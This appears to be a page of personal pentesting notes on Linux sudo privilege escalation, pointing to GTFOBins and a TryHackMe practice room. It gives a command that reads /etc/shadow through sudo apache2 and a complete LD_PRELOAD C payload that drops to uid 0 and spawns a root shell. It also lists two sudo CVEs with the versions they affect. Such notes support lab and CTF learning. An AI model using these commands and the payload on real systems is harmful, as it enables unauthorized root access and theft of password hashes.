Sudo

SUDO SHELL ESCAPING:

Use GTFO bins: https://gtfobins.github.io/

Practice: https://tryhackme.com/room/privescplayground

INTENDED FUNCTIONALITY:

When you can't find an exploit on GTFO bins but you can abuse some functionality of the program running. Suppose the program is apache2 then search: sudo apache2 privilege escalation

Some of the exploits wont let you get a shell but they can help you view system files. It errors out the line which it doesn't understand.

Ex: apache2, wget

sudo apache2 -f /etc/shadow

LD_PRELOAD:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

CVE-2019-14287: sudo 1.8.27

If we get (All, !root) /bin/bash

CVE-2019-18634:

Find sudo version using: sudo -V

If the version is 1.8.21p2 and password feedback is enabled

PreviousLinux PrivEsc NextSUID

Last updated 4 years ago

hashtagSUDO SHELL ESCAPING:

hashtagINTENDED FUNCTIONALITY:

hashtagLD_PRELOAD:

hashtagCVE-2019-14287: sudo 1.8.27

hashtagCVE-2019-18634:

SUDO SHELL ESCAPING:

INTENDED FUNCTIONALITY:

LD_PRELOAD:

CVE-2019-14287: sudo 1.8.27

CVE-2019-18634: